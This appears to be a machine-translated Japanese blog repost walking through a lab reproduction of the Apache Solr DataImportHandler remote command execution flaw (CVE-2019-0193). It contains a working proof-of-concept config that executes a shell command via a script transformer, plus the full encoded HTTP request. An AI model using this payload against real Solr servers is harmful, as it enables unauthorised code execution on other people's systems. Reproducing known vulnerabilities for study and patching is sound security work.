ApacheSolrリモートコマンド実行の脆弱性CVE-2019-0193脆弱性の再発

その他 2021-03-01 01:24:25 訪問数: null

Apache Solrリモートコマンド実行の脆弱性(CVE-2019-0193)

ADummyによって

0x00使用ルート

コアの作成->デバッグモードの選択-> expの書き込み->コマンドの実行

0x01脆弱性の紹介

ApacheSolrはオープンソースの検索サーバーです。SolrはJava言語を使用して開発され、主にHTTPとApacheLuceneに基づいて実装されています。この脆弱性は、Apache SolrのDataImportHandlerに現れました。これは、データベースやその他のソースからデータを抽出するために使用される、オプションですが一般的に使用されるモジュールです。外部リクエストのdataConfigパラメータですべてのDIH設定を設定できる機能があります。DIH構成にはスクリプトが含まれている可能性があるため、攻撃者は危険な要求を作成してリモートコマンドを実行する可能性があります。

影響を受けるバージョン
Apache solr < 8.2.0

0x02脆弱性の再現

あなたはhttp://your-ip:8983/ログインせずにApacheのSolrの管理ページを表示することができます。
ここに画像の説明を挿入

上の図に示すように、最初に新しく作成したtestコアを開き、Dataimport関数を選択してデバッグモードを選択し、次のPOCを入力します。

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

ここに画像の説明を挿入

クリックするExecute with this Confugurationと、次のリクエストパッケージが送信されます。

POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1
Host: localhost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 679
Connection: close
Referer: http://localhost:8983/solr/
Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

コンテナに入り、成功が作成されたことを確認します

ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/weixin_43416469/article/details/114236720
おすすめ
ランキング
uni.request在接口状态码403等还是走success
Springboot は mybatisplus を統合しており、ページング クエリによって返される Page オブジェクトの合計は常に 0 です。
System.InvalidOperationExceptionが:「BuildWindowCoreは、子ウィンドウのハンドル搭乗を返しません。」
[Example 08] IPD system advancement: version naming rules for version management
カスタム NavigationBar -- UIView による描画
データとデータの移行を復元します(個人的なメモ、無用リーダー)
4. 2次元配列で検索する
vim的私人订制
Flutterのカスタムルーティング切り替えアニメーション
Javaコンテナの方法の簡単なアプリケーションのArrayList
アーカイブ
もっと
2024-05-12(27)
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

コードワールド

© 2018 codetd.com